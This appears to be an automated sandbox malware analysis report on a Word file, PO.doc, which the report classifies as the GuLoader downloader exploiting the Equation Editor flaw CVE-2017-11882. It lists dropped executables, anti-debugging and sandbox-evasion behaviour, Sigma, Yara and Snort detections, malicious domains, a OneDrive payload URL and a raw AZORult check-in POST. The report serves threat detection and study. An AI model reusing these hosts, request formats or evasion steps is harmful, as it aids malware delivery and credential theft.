Loading ...

Play interactive tourEdit tour

Analysis Report PO.doc

Overview

General Information

Sample Name:PO.doc
Analysis ID:288935
MD5:0130fdb3041f8fdc413da2de12a20c9c
SHA1:b711ff1e41c069af0d1358a7ca4398759a9830b0
SHA256:ee2c879433d8277e88d27b223e45f73517ab30aa6636468633a98c85172a34b3
Tags:doc

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected VB6 Downloader Generic
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2440 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2288 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • kodjfhfj.exe (PID: 2520 cmdline: C:\Users\user\AppData\Roaming\kodjfhfj.exe MD5: ED5C029E13A88CD8A2ECD9F48B9A83B7)
      • kodjfhfj.exe (PID: 2484 cmdline: C:\Users\user\AppData\Roaming\kodjfhfj.exe MD5: ED5C029E13A88CD8A2ECD9F48B9A83B7)
  • EQNEDT32.EXE (PID: 3052 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2093759643.00000000001B0000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
    Process Memory Space: kodjfhfj.exe PID: 2484JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
      Process Memory Space: kodjfhfj.exe PID: 2484JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
        Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\kodjfhfj.exe, CommandLine: C:\Users\user\AppData\Roaming\kodjfhfj.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\kodjfhfj.exe, NewProcessName: C:\Users\user\AppData\Roaming\kodjfhfj.exe, OriginalFileName: C:\Users\user\AppData\Roaming\kodjfhfj.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2288, ProcessCommandLine: C:\Users\user\AppData\Roaming\kodjfhfj.exe, ProcessId: 2520
        Sigma detected: File Dropped By EQNEDT32EXEShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2288, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\angelwe[1].exe

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Multi AV Scanner detection for domain / URLShow sources
        Source: hotelavlokan.comVirustotal: Detection: 10%Perma Link
        Source: http://hotelavlokan.com/angel/PL341/index.phpVirustotal: Detection: 6%Perma Link
        Source: Http://hotelavlokan.com/Virustotal: Detection: 10%Perma Link
        Multi AV Scanner detection for submitted fileShow sources
        Source: PO.docVirustotal: Detection: 44%Perma Link

        Exploits:

        barindex
        Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\kodjfhfj.exeJump to behavior
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: global trafficDNS query: name: www.uttaranchaltoday.com
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.28.1.185:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.28.1.185:443

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 2029405 ET TROJAN Win32/AZORult V3.3 Client Checkin M2 192.168.2.22:49170 -> 104.28.24.76:80
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
        Source: global trafficHTTP traffic detected: POST /angel/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: hotelavlokan.comContent-Length: 109Cache-Control: no-cacheData Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 35 70 9d 34 70 9d 30 13 8b 30 65 8b 30 62 8b 30 66 8b 30 6d 8b 31 11 8b 30 63 e8 26 66 9b 26 66 97 26 66 9d 26 66 9d 26 66 9e 40 Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp5p4p00e0b0f0m10c&f&f&f&f&f@
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B03F1CD-537D-406E-B057-1B1541B1D39D}.tmpJump to behavior
        Source: kodjfhfj.exe, 00000005.00000002.2093897184.0000000000867000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
        Source: kodjfhfj.exe, 00000004.00000002.2083375873.0000000003080000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
        Source: kodjfhfj.exe, 00000005.00000002.2093897184.0000000000867000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
        Source: unknownDNS traffic detected: queries for: www.uttaranchaltoday.com
        Source: unknownHTTP traffic detected: POST /angel/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: hotelavlokan.comContent-Length: 109Cache-Control: no-cacheData Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 35 70 9d 34 70 9d 30 13 8b 30 65 8b 30 62 8b 30 66 8b 30 6d 8b 31 11 8b 30 63 e8 26 66 9b 26 66 97 26 66 9d 26 66 9d 26 66 9e 40 Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp5p4p00e0b0f0m10c&f&f&f&f&f@
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: Http://hotelavlokan.com/
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: http://crl.micro
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: http://crl.microt%20IT%20TLS%20CA%202.crl0M
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
        Source: kodjfhfj.exe, 00000005.00000003.2093667053.000000001E850000.00000004.00000001.sdmpString found in binary or memory: http://hotelavlokan.com/angel/PL341/index.php
        Source: kodjfhfj.exe, 00000005.00000003.2093667053.000000001E850000.00000004.00000001.sdmpString found in binary or memory: http://hotelavlokan.com/angel/PL341/index.phpA
        Source: kodjfhfj.exe, 00000004.00000002.2083375873.0000000003080000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
        Source: kodjfhfj.exe, 00000004.00000002.2083375873.0000000003080000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
        Source: kodjfhfj.exe, 00000004.00000002.2084645379.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
        Source: kodjfhfj.exe, 00000004.00000002.2084645379.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
        Source: kodjfhfj.exe, 00000005.00000002.2093860305.0000000000804000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.msocsp.com0
        Source: kodjfhfj.exe, 00000004.00000002.2084645379.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
        Source: kodjfhfj.exe, 00000004.00000002.2084645379.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
        Source: kodjfhfj.exe, 00000004.00000002.2083375873.0000000003080000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
        Source: kodjfhfj.exe, 00000004.00000002.2084645379.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
        Source: kodjfhfj.exe, 00000004.00000002.2083375873.0000000003080000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
        Source: kodjfhfj.exe, 00000004.00000002.2083375873.0000000003080000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
        Source: kodjfhfj.exe, 00000005.00000002.2093910894.000000000087F000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/-
        Source: kodjfhfj.exe, 00000005.00000002.2093910894.000000000087F000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/5
        Source: kodjfhfj.exe, 00000005.00000002.2093910894.000000000087F000.00000004.00000020.sdmp, kodjfhfj.exe, 00000005.00000002.2093759643.00000000001B0000.00000040.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=4C3F5C65A99DA195&resid=4C3F5C65A99DA195%21189&authkey=AGDK6_h
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: https://vim0zq.bl.files.1drv.com/
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: https://vim0zq.bl.files.1drv.com/y4mysrbfw_ApiJD7XjQfDWlcPiiz8iQWXtIpVT4-Cu4lX83RiR3ViXgwmHFKYGpWT-y
        Source: kodjfhfj.exe, 00000005.00000002.2093916432.0000000000890000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
        Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

        System Summary:

        barindex
        Office equation editor drops PE fileShow sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\angelwe[1].exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\kodjfhfj.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 5_2_001B0212 EnumWindows,NtSetInformationThread,CloseServiceHandle,5_2_001B0212
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 5_2_001B3772 NtProtectVirtualMemory,5_2_001B3772
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 5_2_001B129A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,NtProtectVirtualMemory,5_2_001B129A
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 5_2_001B3ABF NtSetInformationThread,5_2_001B3ABF
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 5_2_001B1AF8 NtProtectVirtualMemory,5_2_001B1AF8
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 5_2_001B3B1A NtSetInformationThread,5_2_001B3B1A
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 5_2_001B2C18 NtSetInformationThread,CloseServiceHandle,5_2_001B2C18
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 5_2_001B1254 NtProtectVirtualMemory,5_2_001B1254
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 5_2_001B2B6E NtSetInformationThread,CloseServiceHandle,5_2_001B2B6E
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 5_2_001B028A NtSetInformationThread,CloseServiceHandle,5_2_001B028A
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 5_2_001B3B87 NtSetInformationThread,5_2_001B3B87
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 5_2_001B05B5 NtProtectVirtualMemory,LoadLibraryA,5_2_001B05B5
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 5_2_001B12D4 NtProtectVirtualMemory,5_2_001B12D4
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 5_2_001B3AC9 NtSetInformationThread,5_2_001B3AC9
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 5_2_001B1AFE NtProtectVirtualMemory,5_2_001B1AFE
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 5_2_001B3BED NtSetInformationThread,5_2_001B3BED
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 4_2_004052584_2_00405258
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 4_2_004052744_2_00405274
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 4_2_004052164_2_00405216
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 4_2_0040522E4_2_0040522E
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 4_2_0040529A4_2_0040529A
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 4_2_004051724_2_00405172
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 4_2_004029324_2_00402932
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 4_2_004051EA4_2_004051EA
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 5_2_001B2B6E5_2_001B2B6E
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\angelwe[1].exe E74606C2BCF3B9A00E932DC4D2D68E9F8E12A9EBA9AB32167491484F97B9E15F
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\kodjfhfj.exe E74606C2BCF3B9A00E932DC4D2D68E9F8E12A9EBA9AB32167491484F97B9E15F
        Source: angelwe[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: kodjfhfj.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: kodjfhfj.exe, 00000004.00000002.2083375873.0000000003080000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
        Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@7/11@4/2
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$PO.docJump to behavior
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeMutant created: \Sessions\1\BaseNamedObjects\A8AD17B7C-343A2EC6-C0602CB5-673F0738-6F59330C
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRB8D3.tmpJump to behavior
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: PO.docVirustotal: Detection: 44%
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\kodjfhfj.exe C:\Users\user\AppData\Roaming\kodjfhfj.exe
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\kodjfhfj.exe C:\Users\user\AppData\Roaming\kodjfhfj.exe
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\kodjfhfj.exe C:\Users\user\AppData\Roaming\kodjfhfj.exeJump to behavior
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeProcess created: C:\Users\user\AppData\Roaming\kodjfhfj.exe C:\Users\user\AppData\Roaming\kodjfhfj.exeJump to behavior
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
        Source: PO.docStatic file information: File size 1118843 > 1048576
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

        Data Obfuscation:

        barindex
        Yara detected GuLoaderShow sources
        Source: Yara matchFile source: 00000005.00000002.2093759643.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: kodjfhfj.exe PID: 2484, type: MEMORY
        Yara detected VB6 Downloader GenericShow sources
        Source: Yara matchFile source: Process Memory Space: kodjfhfj.exe PID: 2484, type: MEMORY
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 5_2_001B2C89 pushfd ; retf 5_2_001B2C96
        Source: C:\Users\user\AppData\Roaming\kodjfhfj.exeCode function: 5_2_001B26F7 push esp; iretd 5_2_001B26F8
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\angelwe[1].exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\kodjfhfj.exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX